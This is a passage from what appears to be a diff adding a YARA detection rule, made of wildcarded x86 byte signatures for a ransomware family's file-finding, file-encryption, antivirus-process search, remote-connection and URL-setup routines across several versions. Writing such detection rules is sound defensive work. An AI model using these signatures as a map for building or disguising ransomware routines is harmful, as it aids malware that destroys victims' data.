53 89 45 ?? FF 15 ?? ?? ?? + ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73 + ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 + C0 5B 8B E5 5D C3 + } + $crypt_files_v2_1 = { + FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0 + 74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B + 4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ?? + 8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ?? + 8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F + 84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 + ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? + 56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6 + ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7 + 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ?? + 8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 + 40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 + F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? + 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 + FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? + 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ?? + ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 + ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? + FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47 + FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 + C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF + D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50 + 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ?? + 85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85 + C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ?? + 53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? + 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ?? + ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? + ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3 + 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48 + ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6 + FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 + 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ?? + 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B + CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 + ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ?? + ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B + 44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 + 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ?? + 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? + FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3 + } + $remote_connection_v2_1 = { + 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ?? + ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6 + 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ?? + ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 + ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 + 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ?? + ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ?? + 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8 + ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 + FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF + D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F + 5E 5B 8B E5 5D C3 + } + $search_antivirus_processes_v4_1_2 = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ?? + 89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ?? + ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ?? + 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85 + F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 + 5D C3 + } + $find_files_v4_1_2 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 + 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 + ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? + 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? + ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? + 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 + 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? + ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? + ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 + 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E + 5B 8B E5 5D C3 + } + $crypt_files_v4_1_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8 + ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 + ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE + ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89 + 5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D + 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D + ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ?? + ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89 + 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? + ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68 + ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? + ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D + 48 ?? 89 4D ?? EB + } + $remote_connection_v4_1_2 = { + 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 + 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? + ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 + ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF + 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF + 15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B + E5 5D C2 + } + $url_parameters_setup_v4_1_2 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? + ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF + D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 + ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? + ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0 + E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ?? + 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53 + FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? + FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8 + } + $url_parameters_setup_v4 = { + 55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF + 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ?? + ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? + ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15 + ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? + ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 + 68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8 + } + $search_antivirus_processes_v4 = { + 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E + 33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF + 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB + ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ?? + EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6 + FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ?? + ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? + FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74 + ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75 + ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2 + } + $find_files_v4 = { + C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ?? + ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24 + ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 + 46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 + ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B + E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6 + 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 + ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 + FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83 + C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E + 33 C0 5B 8B E5 5D C3 + } + $crypt_files_v4 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ?? + ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B + 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? + 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ?? + ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B + 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68 + ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? 